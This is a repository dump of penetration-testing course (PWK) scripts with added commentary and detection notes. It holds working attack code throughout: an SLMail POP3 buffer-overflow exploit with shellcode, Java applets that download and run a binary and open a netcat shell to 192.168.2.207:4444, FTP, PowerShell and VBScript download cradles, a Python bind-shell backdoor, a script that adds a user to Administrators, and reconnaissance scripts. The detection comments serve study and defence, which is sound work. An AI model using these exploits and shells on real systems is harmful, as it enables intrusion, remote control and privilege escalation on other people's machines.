├── README.md
├── buffoverflow
├── pop3-pass-fuzz.py
├── slmail-pop3-badchartest.py
└── slmail-pop3.py
├── clientside
├── Java-nc-example.java
├── Java.java
├── java.html
└── manifest.txt
├── pingscan.sh
├── post
├── ftp-commands
├── powershell-download
├── setup-ftp.sh
└── wget-vbs
├── privesc
└── useradd.c
├── resolv.sh
├── scripts
└── bind-trojan.py
└── vrfy.py
/README.md:
--------------------------------------------------------------------------------
1 | # pwk
2 | pwk notes and scripts
3 |
--------------------------------------------------------------------------------
/buffoverflow/pop3-pass-fuzz.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# PWK lab script (Python 2 syntax): sends the POP3 PASS command with
# progressively longer arguments to a hard-coded host, opening a new TCP
# session for every probe.
import socket

# Create an array of buffers, while incrementing them.
# Result: 31 probe strings -- a single "A", then lengths
# 100, 300, 500, ..., 5900 (step 200).

buffer=["A"]
counter=100
while len(buffer) <= 30:
    buffer.append("A"*counter)
    counter=counter+200

for string in buffer:
    print "Fuzzing PASS with %s bytes" % len(string)
    # Fresh socket per probe; nothing from the previous session is reused.
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # socket.connect() returns None, so `connect` never holds anything useful.
    connect=s.connect(('192.168.2.202',110))
    s.recv(1024)                      # server greeting, discarded
    s.send('USER test\r\n')
    s.recv(1024)                      # USER response, discarded
    s.send('PASS ' + string + '\r\n')
    # No response is read after PASS; QUIT and close follow immediately.
    s.send('QUIT\r\n')
    s.close()
    # Detection note: 31 back-to-back POP3 sessions from one client whose
    # PASS argument grows to several KB is an unambiguous fuzzing signature.
22 |
--------------------------------------------------------------------------------
/buffoverflow/slmail-pop3-badchartest.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# PWK lab script (Python 2 syntax): sends one oversized POP3 PASS argument,
# ending in a sweep of byte values, to a hard-coded host.
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Every byte value from 0x01 to 0xff except 0x0a; 0x00 is also absent.
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13"
"\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26"
"\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39"
"\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c"
"\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72"
"\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85"
"\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98"
"\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab"
"\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe"
"\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
"\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4"
"\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7"
"\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )

#buffer = "A"*2606 + "B"*4 + "C"*(3500-2606-4)
# 2606 filler bytes, a 4-byte "B" marker, then the byte sweep above
# (2864 bytes in total).
buffer = "A"*2606 + "B"*4 + badchars


try:
    print "\nSending evil buffer..."
    s.connect(('192.168.2.202',110))
    data = s.recv(1024)               # greeting, not inspected
    s.send('USER username' +'\r\n')
    data = s.recv(1024)               # USER response, not inspected
    s.send('PASS ' + buffer +'\r\n')
    print "\nDone!."
# Bare except: a refused connection, a reset during send() and a
# KeyboardInterrupt are all reported as "Could not connect to POP3!".
# Detection note: a ~2.8 KB POP3 PASS argument containing the full high-byte
# range never comes from a legitimate mail client.
except:
    print "Could not connect to POP3!"
35 |
36 |
--------------------------------------------------------------------------------
/buffoverflow/slmail-pop3.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# PWK lab script (Python 2 syntax).  The payload assembled further down is
# sent as the POP3 PASS argument to a hard-coded host; see the try block at
# the end of the file.
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
4 |
5 | shellcode = ("\xfd\x18\xe1\x09\xe0\x05\x14\x93\xbb\x42\xd6\x3d\x1c\xb5\xb7"
6 | "\x48\xdd\xc5\xba\x70\x4a\x61\xe7\xd9\x74\x24\xf4\x5e\x31\xc9"
7 | "\xb1\x52\x31\x56\x17\x83\xc6\x04\x03\x26\x59\x83\x12\x3a\xb5"
8 | "\xc1\xdd\xc2\x46\xa6\x54\x27\x77\xe6\x03\x2c\x28\xd6\x40\x60"
9 | "\xc5\x9d\x05\x90\x5e\xd3\x81\x97\xd7\x5e\xf4\x96\xe8\xf3\xc4"
10 | "\xb9\x6a\x0e\x19\x19\x52\xc1\x6c\x58\x93\x3c\x9c\x08\x4c\x4a"
11 | "\x33\xbc\xf9\x06\x88\x37\xb1\x87\x88\xa4\x02\xa9\xb9\x7b\x18"
12 | "\xf0\x19\x7a\xcd\x88\x13\x64\x12\xb4\xea\x1f\xe0\x42\xed\xc9"
13 | "\x38\xaa\x42\x34\xf5\x59\x9a\x71\x32\x82\xe9\x8b\x40\x3f\xea"
14 | "\x48\x3a\x9b\x7f\x4a\x9c\x68\x27\xb6\x1c\xbc\xbe\x3d\x12\x09"
15 | "\xb4\x19\x37\x8c\x19\x12\x43\x05\x9c\xf4\xc5\x5d\xbb\xd0\x8e"
16 | "\x06\xa2\x41\x6b\xe8\xdb\x91\xd4\x55\x7e\xda\xf9\x82\xf3\x81"
17 | "\x95\x67\x3e\x39\x66\xe0\x49\x4a\x54\xaf\xe1\xc4\xd4\x38\x2c"
18 | "\x13\x1a\x13\x88\x8b\xe5\x9c\xe9\x82\x21\xc8\xb9\xbc\x80\x71"
19 | "\x52\x3c\x2c\xa4\xf5\x6c\x82\x17\xb6\xdc\x62\xc8\x5e\x36\x6d"
20 | "\x37\x7e\x39\xa7\x50\x15\xc0\x20\x9f\x42\xc8\x78\x77\x91\xcc"
21 | "\x79\x33\x1c\x2a\x13\x53\x49\xe5\x8c\xca\xd0\x7d\x2c\x12\xcf"
22 | "\xf8\x6e\x98\xfc\xfd\x21\x69\x88\xed\xd6\x99\xc7\x4f\x70\xa5"
23 | "\xfd\xe7\x1e\x34\x9a\xf7\x69\x25\x35\xa0\x3e\x9b\x4c\x24\xd3"
24 | "\x82\xe6\x5a\x2e\x52\xc0\xde\xf5\xa7\xcf\xdf\x78\x93\xeb\xcf"
25 | "\x44\x1c\xb0\xbb\x18\x4b\x6e\x15\xdf\x25\xc0\xcf\x89\x9a\x8a"
26 | "\x87\x4c\xd1\x0c\xd1\x50\x3c\xfb\x3d\xe0\xe9\xba\x42\xcd\x7d"
27 | "\x4b\x3b\x33\x1e\xb4\x96\xf7\x3e\x57\x32\x02\xd7\xce\xd7\xaf"
28 | "\xba\xf0\x02\xf3\xc2\x72\xa6\x8c\x30\x6a\xc3\x89\x7d\x2c\x38"
29 | "\xe0\xee\xd9\x3e\x57\x0e\xc8")
30 |
31 | buffer = "A"*2606 + "\x8f\x35\x4a\x5f" + shellcode +"C"*(3500-2606-4-351)
32 |
33 |
try:
    print "\nSending evil buffer..."
    # Relies on the module-level `s` and `buffer` defined above.
    s.connect(('192.168.2.210',110))
    data = s.recv(1024)               # greeting, not inspected
    s.send('USER username' +'\r\n')
    data = s.recv(1024)               # USER response, not inspected
    s.send('PASS ' + buffer +'\r\n')
    print "\nDone!."
# Bare except: a refused connection, a reset during send() and a
# KeyboardInterrupt are all reported as "Could not connect to POP3!".
# Detection note: a POP3 PASS argument of several KB is not legitimate
# client traffic.
except:
    print "Could not connect to POP3!"
44 |
45 |
--------------------------------------------------------------------------------
/clientside/Java-nc-example.java:
--------------------------------------------------------------------------------
1 | import java.applet.*;
2 | import java.awt.*;
3 | import java.io.*;
4 | import java.net.URL;
5 | import java.util.*;
6 | import java.net.URL;
7 |
8 | /**
9 | * Author: Offensive Security
10 | * This Java applet will download a file and execute it.
11 | **/
12 |
public class Java extends Applet {

    // Never assigned anywhere in this class, so isInitialized() always
    // returns null.
    private Object initialized = null;
    public Object isInitialized()
    {
        return initialized;
    }
    /**
     * Applet entry point.  Reads applet parameter "1" as a URL, streams the
     * response into {@code <java.io.tmpdir>/evil.exe}, then launches it via
     * cmd.exe with a fixed host, port and "-e cmd.exe" argument list
     * (netcat-style, per the file name).  The file write and Runtime.exec
     * would be blocked in the default applet sandbox; manifest.txt in this
     * directory requests "Permissions: all-permissions" for that reason.
     *
     * Detection: an applet writing an executable into the temp directory
     * followed by the Java process spawning cmd.exe is the pattern to alert on.
     */
    public void init() {
        Process f;   // assigned below but never read
        try {
            String tmpdir = System.getProperty("java.io.tmpdir") + File.separator;
            String expath = tmpdir + "evil.exe";
            String download = "";
            // getParameter() returns null when the <applet> tag has no
            // parameter named "1"; length() then throws a NullPointerException,
            // which the second catch block reports via printStackTrace().
            download = getParameter("1");
            if (download.length() > 0) {
                // URL parameter
                URL url = new URL(download);
                // Get an input stream for reading
                InputStream in = url.openStream();
                // Create a buffered input stream for efficency
                BufferedInputStream bufIn = new BufferedInputStream(in);
                File outputFile = new File(expath);
                OutputStream out = new BufferedOutputStream(new FileOutputStream(outputFile));
                byte[] buffer = new byte[2048];
                // read() returns -1 at end of stream; 0 is only possible for a
                // zero-length buffer, so "<= 0" is effectively an EOF test.
                for (;;) {
                    int nBytes = bufIn.read(buffer);
                    if (nBytes <= 0) break;
                    out.write(buffer, 0, nBytes);
                }
                // Streams are closed only on the success path; an IOException
                // mid-copy leaks both handles (no finally / try-with-resources).
                out.flush();
                out.close();
                in.close();
                f = Runtime.getRuntime().exec("cmd.exe /c " + expath +" 192.168.2.207 4444 -e cmd.exe");
            }
        } catch(IOException e) {
            e.printStackTrace();
        }
        /* ended here and commented out below for bypass */
        catch (Exception exception)
        {
            exception.printStackTrace();
        }
    }
}
57 |
--------------------------------------------------------------------------------
/clientside/Java.java:
--------------------------------------------------------------------------------
1 | import java.applet.*;
2 | import java.awt.*;
3 | import java.io.*;
4 | import java.net.URL;
5 | import java.util.*;
6 | import java.net.URL;
7 |
8 | /**
9 | * Author: Offensive Security
10 | * This Java applet will download a file and execute it.
11 | **/
12 |
public class Java extends Applet {

    // Never assigned anywhere in this class, so isInitialized() always
    // returns null.
    private Object initialized = null;
    public Object isInitialized()
    {
        return initialized;
    }
    /**
     * Applet entry point.  Reads applet parameter "1" as a URL, streams the
     * response into {@code <java.io.tmpdir>/evil.exe}, then launches it via
     * cmd.exe with no further arguments.  The file write and Runtime.exec
     * would be blocked in the default applet sandbox; manifest.txt in this
     * directory requests "Permissions: all-permissions" for that reason.
     *
     * Detection: an applet writing an executable into the temp directory
     * followed by the Java process spawning cmd.exe is the pattern to alert on.
     */
    public void init() {
        Process f;   // assigned below but never read
        try {
            String tmpdir = System.getProperty("java.io.tmpdir") + File.separator;
            String expath = tmpdir + "evil.exe";
            String download = "";
            // getParameter() returns null when the <applet> tag has no
            // parameter named "1"; length() then throws a NullPointerException,
            // which the second catch block reports via printStackTrace().
            download = getParameter("1");
            if (download.length() > 0) {
                // URL parameter
                URL url = new URL(download);
                // Get an input stream for reading
                InputStream in = url.openStream();
                // Create a buffered input stream for efficency
                BufferedInputStream bufIn = new BufferedInputStream(in);
                File outputFile = new File(expath);
                OutputStream out = new BufferedOutputStream(new FileOutputStream(outputFile));
                byte[] buffer = new byte[2048];
                // read() returns -1 at end of stream; 0 is only possible for a
                // zero-length buffer, so "<= 0" is effectively an EOF test.
                for (;;) {
                    int nBytes = bufIn.read(buffer);
                    if (nBytes <= 0) break;
                    out.write(buffer, 0, nBytes);
                }
                // Streams are closed only on the success path; an IOException
                // mid-copy leaks both handles (no finally / try-with-resources).
                out.flush();
                out.close();
                in.close();
                f = Runtime.getRuntime().exec("cmd.exe /c " + expath);
            }

        } catch(IOException e) {
            e.printStackTrace();
        }
        /* ended here and commented out below for bypass */
        catch (Exception exception)
        {
            exception.printStackTrace();
        }
    }
}
58 |
--------------------------------------------------------------------------------
/clientside/java.html:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/clientside/manifest.txt:
--------------------------------------------------------------------------------
1 | Permissions: all-permissions
2 |
--------------------------------------------------------------------------------
/pingscan.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Ping sweep of 192.168.2.1-254, split across two loops.  Every ping pipeline
# is backgrounded (&), so all ~254 probes go out nearly at once, the script
# returns before the replies are printed, and output order is arbitrary.
# Each responder's address is cut out of its "bytes from <ip>:" reply line.
#
# Detection: ~254 ICMP echo requests from one source within a second or two,
# one per address of a /24, is the classic sweep signature.

for ip in $(seq 1 125); do
    ping -c 1 192.168.2.$ip |grep "bytes from" |cut -d" " -f4 |cut -d":" -f1 &
done
for ip2 in $(seq 126 254); do
    ping -c 1 192.168.2.$ip2 |grep "bytes from" |cut -d" " -f4 |cut -d":" -f1 &
done
9 |
--------------------------------------------------------------------------------
/post/ftp-commands:
--------------------------------------------------------------------------------
REM PWK post-exploitation helper (Windows cmd): writes an ftp command script
REM to ftp.txt, then has ftp.exe replay it non-interactively with -s:.
REM The script logs in with the hard-coded user "offsec" / password "evilftp",
REM switches to binary mode, GETs evil.exe and disconnects.
REM Detection: ftp.exe started with -s: by a non-interactive parent, and a
REM plaintext FTP login immediately followed by an .exe transfer.
echo open 192.168.2.200 21> ftp.txt
echo offsec>> ftp.txt
echo evilftp>> ftp.txt
echo bin >> ftp.txt
echo GET evil.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt
8 |
9 |
--------------------------------------------------------------------------------
/post/powershell-download:
--------------------------------------------------------------------------------
REM PWK post-exploitation helper (Windows cmd): writes a five-line PowerShell
REM script, wget.ps1, that downloads a hard-coded URL with
REM System.Net.WebClient.DownloadFile into new-exploit.exe in the current
REM directory.  This snippet only writes the file; nothing here executes it.
REM $storageDir is assigned but never used by the generated script.
REM Detection: PowerShell script-block logging (event 4104) surfaces the
REM WebClient/DownloadFile download cradle; a .ps1 created by cmd.exe echo
REM redirection is itself unusual.
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://192.168.2.200/exploit.exe" >>wget.ps1
echo $file = "new-exploit.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
6 |
--------------------------------------------------------------------------------
/post/setup-ftp.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Stands up a pure-ftpd server with virtual-user (PureDB) authentication for
# lab file transfers.  Expected to run as root (useradd, writes under /etc,
# service restart).  There is no error handling: a failing step -- e.g. the
# cd -- does not stop the steps after it, so check the output.

groupadd ftpgroup
# System account that owns the FTP tree; its "shell" is /etc, a directory,
# so the account cannot be used for interactive login.
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
# Virtual FTP user "offsec" mapped onto the ftpuser system account and homed
# in /ftphome; pure-pw prompts for the password interactively.
pure-pw useradd offsec -u ftpuser -d /ftphome
pure-pw mkdb
# Enable the PureDB authentication backend.
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
12 |
--------------------------------------------------------------------------------
/post/wget-vbs:
--------------------------------------------------------------------------------
REM PWK post-exploitation helper (Windows cmd): writes wget.vbs, a VBScript
REM HTTP downloader, one echo per line.  The generated script takes the URL
REM as its first argument and the output path as its second.  It tries
REM WinHttp.WinHttpRequest.5.1 first, then three fallback COM classes, issues
REM a blocking GET and writes the response body byte by byte through a text
REM stream.  strData and strBuffer are initialised but never used.
REM Detection: a freshly echo-written .vbs run by cscript/wscript that
REM instantiates WinHttp.WinHttpRequest, MSXML2.ServerXMLHTTP or
REM Microsoft.XMLHTTP.
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 and Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
26 |
27 |
--------------------------------------------------------------------------------
/privesc/useradd.c:
--------------------------------------------------------------------------------
/*
 * PWK privilege-escalation helper (Windows target): adds the local account
 * "lowpriv" to the Administrators group by shelling out to net.exe.  It has
 * no effect unless the calling context already holds the right to modify
 * that group.
 *
 * Detection: net.exe / net1.exe invoked with "localgroup administrators ...
 * /add" from an unexpected parent, and Security event 4732 (member added to
 * a security-enabled local group).
 */
/* NOTE(review): the header name is missing as published; system() is
 * declared in <stdlib.h>. */
#include
int main ()
{
    int i;
    /* system()'s return status is stored in i but never checked. */
    i=system ("net localgroup administrators lowpriv /add");
    return 0;
}
8 |
9 |
--------------------------------------------------------------------------------
/resolv.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Reverse-resolves a list of IP addresses (one per line in the file given as
# $1) and prints the PTR name followed by the address.

if [ -z "$1" ]; then
    echo "[*] Resolves dns name of ip addresses"
    # NOTE(review): the argument placeholder after "$0 " appears to have been
    # lost in rendering; the script expects a file path here.
    echo "[*] Usage: $0 "
    exit 0
fi

# Word-splits the file contents; fine for one address per line.
for ip in $(cat $1); do
    # Without `set -o pipefail` the pipeline's status is cut's, which is 0
    # even when grep matched nothing, so `echo $ip` runs for every address.
    nslookup $ip |grep "name" |cut -d" " -f3 && echo $ip;
done
12 |
--------------------------------------------------------------------------------
/scripts/bind-trojan.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# Bind-shell backdoor (Python 2 syntax): waits on every interface on TCP 4444
# and, for each connection, sends a banner, reads one line, runs it through a
# shell and returns the combined stdout/stderr, then closes the connection --
# one command per connection, no authentication of the peer.
#
# Detection: an unexpected listener on TCP/4444 owned by a Python
# interpreter, a Python process spawning shell children, and the literal
# banner "[+] Welcome Master" on the wire.

import socket
import subprocess

host = '0.0.0.0'     # all interfaces
port = 4444

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host,port))
while 1:
    client, address = s.accept()   # `address` is never used
    client.send("[+] Welcome Master\r\n\r\n>")
    data = client.recv(1024)
    if data:
        # shell=True with peer-supplied input: remote command execution is
        # the intended behaviour here, not an accident.
        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        data = proc.stdout.read() + proc.stderr.read()
        client.send(data)
    client.close()
20 |
--------------------------------------------------------------------------------
/vrfy.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# PWK lab script (Python 2 syntax): SMTP user enumeration.  Connects to port
# 25 of argv[1], prints the banner, then issues one VRFY per line of the file
# argv[2] and prints each reply.
#
# Detection / mitigation: a run of VRFY commands from one client is textbook
# account enumeration.  Mail servers can refuse the verb outright (Postfix:
# disable_vrfy_command = yes); otherwise rate-limit or alert on it.

import socket
import sys

if len(sys.argv) != 3:
    # NOTE(review): the argument placeholders after "vrfy.py " appear to have
    # been lost in rendering; from the code below the expected form is
    # <host> <userlist-file>.
    print "Usage: vrfy.py "
    sys.exit(0)

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Create a Socket
connect=s.connect((sys.argv[1],25)) # Connect to the Server (connect() returns None)
banner=s.recv(1024) # Receive the banner
print banner
f = open(sys.argv[2], 'r') # open file, read only; never closed explicitly
for user in f: # loop over list
    # Each line is sent verbatim, trailing newline included, so the file's
    # own line ending serves as the command terminator.
    s.send('VRFY ' + user) #VRFY a user
    result=s.recv(1024)
    print result
s.close() # Close the socket
20 |
--------------------------------------------------------------------------------